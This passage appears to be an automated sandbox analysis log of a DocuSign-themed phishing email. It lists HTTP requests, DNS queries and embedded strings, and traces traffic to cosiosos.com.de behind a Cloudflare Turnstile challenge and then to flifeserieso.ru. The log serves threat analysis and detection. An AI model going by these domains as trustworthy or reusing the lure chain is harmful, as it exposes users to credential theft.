kIENvbG9yIjogZmFsc2UsIkJyYW5kZWQgRmlsZSI6IGZhbHNlLCJDb25jYXQgTW9kZSI6IGZhbHNlLCJBdHRhY2htZW50IEFkZGVkIjogZmFsc2UsIkF0dGFjaG1lbnQgQ291bnQiOiAwLCJBdHRhY2htZW50IE1ldGhvZCI6IG51bGwsIlBhZ2VzIjogIjEiLCJEb2NzIjogIjEiLCJBdXRoZW50aWNhdGlvbiI6ICJOb25lIiwiTG9nZ2VkIEluIjogZmFsc2UsIkNvbnNlbnQgU2hvd24iOiB0cnVlLCJBY2NvdW50IEhvbGRlciI6IGZhbHNlLCJGaWVsZCBTaWduYXR1cmUiOiBmYWxzZSwiRmllbGQgSW5pdGlhbCI6IGZhbHNlLCJGaWVsZCBTdGFtcCI6IGZhbHNlLCJGaWVsZCBEYXRlIjogZmFsc2UsIkZpZWxkIFRleHQiOiBmYWxzZSwiRmllbGQgTmFtZSI6IGZhbHNlLCJGaWVsZCBDb21wYW55IjogZmFsc2UsIkZpZWxkIFRpdGxlIjogZmFsc2UsIkZpZWxkIEVtYWlsIjogZmFsc2UsIkZpZWxkIENoZWNrYm94IjogZmFsc2UsIkZpZWxkIFJhZGlvIjogZmFsc2UsIkZpZWxkIERyb3Bkb3duIjogZmFsc2UsIkZpZWxkIEF0dGFjaG1lbnQiOiBmYWxzZSwiRmllbGQgTm90ZSI6IGZhbHNlLCJGaWVsZCBBcHByb3ZlIjogZmFsc2UsIkZpZWxkIERlY2xpbmUiOiBmYWxzZSwiRmllbGQgVmlldyI6IGZhbHNlLCJGaWVsZCBGb3JtdWxhIjogZmFsc2UsIlRlbXBsYXRlIFVzZWQiOiBmYWxzZSwiU3VwcGxlbWVudGFsIERvY3VtZW50IENvdW50IjogMCwiU3VwcGxlbWVudGFsIERvY3VtZW50IFJlcXVpcmVtZW50cyI6ICIiLCJBdXRvQ29tcGxldGUgRW5hYmxlZCI6IGZhbHNlLCJwcm9kdWN0IGFyZWEiOiAiU2lnbmluZyIsIkZyZWVmb3JtIjogZmFsc2UsIlNpZ25pbmdFeHRlbnNpb25zIjogdHJ1ZSwiQnJvd3NlciBXaWR0aCBJbml0aWFsIjogMTI4MCwiQnJvd3NlciBIZWlnaHQgSW5pdGlhbCI6IDkwNywiQnJvd3NlciBXaWR0aCI6IDEyODAsIkJyb3dzZXIgSGVpZ2h0IjogOTA3LCJTZXNzaW9uIEFib3V0IHRvIEV4cGlyZSBDb3VudCI6IDAsIlRvcCBGaW5pc2ggSGlkZGVuIjogZmFsc2UsIlBvd2VyRm9ybSI6IGZhbHNlLCJBL0IgVGVzdHMiOiAiaWZyYW1lbGVzczogbW9iaWxlIiwiUG93ZXJmb3JtIFNlbmRlciI6IGZhbHNlLCJQbGF0Zm9ybSI6ICJXZWIgQXBwIiwiRFNfQSI6ICJjZDZjODQxOC1iN2M4LTRlNDEtYjcwMC0xZDc4ZTIyYjM1OTAiLCJ0b2tlbiI6ICIzMDRjY2JkZTI0ZDNiMTVmZmUyZDVkZTMwYzEwZGFiMiJ9fQ%3D%3D&ip=1&_=1730223972817 HTTP/1.1Host: api.mixpanel.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5
Source: global traffic	HTTP traffic detected: GET /7i2ko/ HTTP/1.1Host: cosiosos.com.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://cosiosos.com.de/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/g/f2bbd6738e15/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://cosiosos.com.de/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/g/f2bbd6738e15/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/910uj/0x4AAAAAAAymLki0nrxyy8m1/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://cosiosos.com.de/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: cosiosos.com.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cosiosos.com.de/7i2ko/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=64bes3fr1ldegf61evvb22jcl6
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/910uj/0x4AAAAAAAymLki0nrxyy8m1/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://cosiosos.com.de/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8da4fc5b09f32845&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/910uj/0x4AAAAAAAymLki0nrxyy8m1/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/910uj/0x4AAAAAAAymLki0nrxyy8m1/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8da4fc5b09f32845&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1791242059:1730220306:hIeyHqvqAccxbbm_d8DrvjbO0QBodfJlv7y3N_edJQw/8da4fc5b09f32845/lvhtOsKNcCfcfrt0ku2v17ixFLNSgZzFX4Vo47Kh81E-1730223994-1.1.1.1-M_x_gxlO74O9ZlqtQnFTaE.kRURIq0V2sN_HzuC_s_HLi.8Bl2E57.DtlSzwL1gQ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8da4fc5b09f32845/1730223996758/1e184772ca6413f778890ebf4ae4a78ff3b0fbad3e6bc6e49bef09eb3011d191/B-gsnUcxkDLo1qD HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/910uj/0x4AAAAAAAymLki0nrxyy8m1/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8da4fc5b09f32845/1730223996761/-6kEvfHpi1C4zu8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/910uj/0x4AAAAAAAymLki0nrxyy8m1/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8da4fc5b09f32845/1730223996761/-6kEvfHpi1C4zu8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1791242059:1730220306:hIeyHqvqAccxbbm_d8DrvjbO0QBodfJlv7y3N_edJQw/8da4fc5b09f32845/lvhtOsKNcCfcfrt0ku2v17ixFLNSgZzFX4Vo47Kh81E-1730223994-1.1.1.1-M_x_gxlO74O9ZlqtQnFTaE.kRURIq0V2sN_HzuC_s_HLi.8Bl2E57.DtlSzwL1gQ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1791242059:1730220306:hIeyHqvqAccxbbm_d8DrvjbO0QBodfJlv7y3N_edJQw/8da4fc5b09f32845/lvhtOsKNcCfcfrt0ku2v17ixFLNSgZzFX4Vo47Kh81E-1730223994-1.1.1.1-M_x_gxlO74O9ZlqtQnFTaE.kRURIq0V2sN_HzuC_s_HLi.8Bl2E57.DtlSzwL1gQ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://cosiosos.com.de/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/font-awesome/6.5.0/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://cosiosos.com.de/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET // HTTP/1.1Host: flifeserieso.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: eu.docusign.net
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: docucdn-a.akamaihd.net
Source: global traffic	DNS traffic detected: DNS query: a.docusign.com
Source: global traffic	DNS traffic detected: DNS query: api.mixpanel.com
Source: global traffic	DNS traffic detected: DNS query: cdn.optimizely.com
Source: global traffic	DNS traffic detected: DNS query: cosiosos.com.de
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: flifeserieso.ru
Source: global traffic	DNS traffic detected: DNS query: cdn.jsdelivr.net

Source: unknown

HTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Oct 2024 17:46:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: BYPASSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=78PcKPPc%2BblG5PoT1jZcMGvy0TBphHg6dRAaBqMRmtpWSoW8b8ghN%2FZXDLM9HZRqdHN2eldibX4W6tTXEPjuHGieGOcBTyAtlal30hZjAgvDhV%2BQtpv8anVv0yCaeZ5ED1Y%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8da4fc3a9e704788-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1924&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1216&delivery_rate=1489711&cwnd=251&unsent_bytes=0&cid=de871257fc9193b9&ts=2352&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Oct 2024 17:46:38 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: AbMt6Kny/1HNwuaZLbFnIbjRhQEj3sWYgfQ=$nFp+kqhPQCh45ZhBcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8da4fc782f0c6b9a-DFWalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Oct 2024 17:46:42 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: EMHG/oIhnhRU+h+CKspl7ftxrgKgk0Y3AWw=$IMgQrsyaBi4H8gaPServer: cloudflareCF-RAY: 8da4fc8e7e882cb4-DFWalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Oct 2024 17:46:52 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: TDheRPH+wySt8jVtQtLmLhVtQ/QvhojZano=$mtPhcHAYQjPNtYBTServer: cloudflareCF-RAY: 8da4fccd999c6c74-DFWalt-svc: h3=":443"; ma=86400

Source: chromecache_188.11.dr, chromecache_169.11.dr	String found in binary or memory: http://dbj.org/dbj/?p=286
Source: chromecache_188.11.dr, chromecache_169.11.dr	String found in binary or memory: http://dean.edwards.name/weblog/2005/10/add-event/
Source: chromecache_188.11.dr, chromecache_169.11.dr	String found in binary or memory: http://documentcloud.github.com/underscore/
Source: chromecache_188.11.dr, chromecache_169.11.dr	String found in binary or memory: http://hacks.mozilla.org/2009/07/cross-site-xmlhttprequest-with-cors/
Source: chromecache_188.11.dr, chromecache_169.11.dr	String found in binary or memory: http://mixpanel.com/
Source: chromecache_188.11.dr, chromecache_169.11.dr	String found in binary or memory: http://www.ecma-international.org/ecma-262/5.1/#sec-12.4
Source: ~WRS{318981B6-151B-4DCC-A0C6-FBB8743FF0B3}.tmp.3.dr	String found in binary or memory: https://aka.ms/LearnAboutSenderIdentification
Source: chromecache_198.11.dr	String found in binary or memory: https://apps.docusign.com/cdn/production/1ds/widgets/
Source: ~WRS{318981B6-151B-4DCC-A0C6-FBB8743FF0B3}.tmp.3.dr	String found in binary or memory: https://community.docusign.com/esignature-111?utm_campaign=GBL_US_PRD_AWA_2405_CommunityCTA&utm_medi
Source: chromecache_188.11.dr, chromecache_169.11.dr	String found in binary or memory: https://developer.mozilla.org/en-US/docs/DOM/XMLHttpRequest#withCredentials
Source: ~WRS{318981B6-151B-4DCC-A0C6-FBB8743FF0B3}.tmp.3.dr	String found in binary or memory: https://docucdn-a.akamaihd.net/olive/images/2.62.0/global-assets/email-templates/email-logo.png
Source: chromecache_198.11.dr	String found in binary or memory: https://docucdn-a.akamaihd.net/production/1ds/widgets/
Source: chromecache_198.11.dr	String found in binary or memory: https://eu.docusign.net
Source: ~WRS{318981B6-151B-4DCC-A0C6-FBB8743FF0B3}.tmp.3.dr	String found in binary or memory: https://eu.docusign.net/Signing/EmailStart.aspx?a=9eb1232d-b669-47cc-b565-df3c91f4d5f7&etti=24&acct=
Source: ~WRS{318981B6-151B-4DCC-A0C6-FBB8743FF0B3}.tmp.3.dr	String found in binary or memory: https://eu.docusign.net/member/Images/email/docInvite-white.png
Source: chromecache_188.11.dr, chromecache_169.11.dr	String found in binary or memory: https://gist.github.com/1930440
Source: chromecache_188.11.dr, chromecache_169.11.dr	String found in binary or memory: https://github.com/douglascrockford/JSON-js/blob/master/json_parse.js
Source: chromecache_207.11.dr, chromecache_162.11.dr	String found in binary or memory: https://github.com/zloirock/core-js
Source: chromecache_207.11.dr, chromecache_162.11.dr	String found in binary or memory: https://github.com/zloirock/core-js/blob/v3.30.2/LICENSE
Source: OUTLOOK_16_0_16827_20130-20241029T1344530496-6316.etl.3.dr	String found in binary or memory: https://login.windows.localR
Source: OUTLOOK_16_0_16827_20130-20241029T1344530496-6316.etl.3.dr	String found in binary or memory: https://login.windows.localnull
Source: ~WRS{318981B6-151B-4DCC-A0C6-FBB8743FF0B3}.tmp.3.dr	String found in binary or memory: https://protect.docusign.net/report-abuse?e=AUtomjpFak9GlbPL0zFFi11QWZPQRVAXy0-T2ps_NbUh_ZoXBfZPath_
Source: ~WRS{318981B6-151B-4DCC-A0C6-FBB8743FF0B3}.tmp.3.dr	String found in binary or memory: https://support.docusign.com/
Source: ~WRS{318981B6-151B-4DCC-A0C6-FBB8743FF0B3}.tmp.3.dr	String found in binary or memory: https://support.docusign.com/en/articles/How-do-I-manage-my-email-notifications
Source: ~WRS{318981B6-151B-4DCC-A0C6-FBB8743FF0B3}.tmp.3.dr	String found in binary or memory: https://support.docusign.com/en/guides/Declining-to-sign-DocuSign-Signer-Guide
Source: ~WRS{318981B6-151B-4DCC-A0C6-FBB8743FF0B3}.tmp.3.dr	String found in binary or memory: https://support.docusign.com/s/articles/How-do-I-sign-a-DocuSign-document-Basic-Signing?language=en_
Source: chromecache_198.11.dr	String found in binary or memory: https://wdk-agent-2.docusigntest.com/#Signing/Controllers/MonitoringController.cs
Source: ~WRS{318981B6-151B-4DCC-A0C6-FBB8743FF0B3}.tmp.3.dr	String found in binary or memory: https://www.docusign.com/features-and-benefits/mobile?utm_campaign=GBL_XX_DBU_UPS_2211_SignNotificat

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
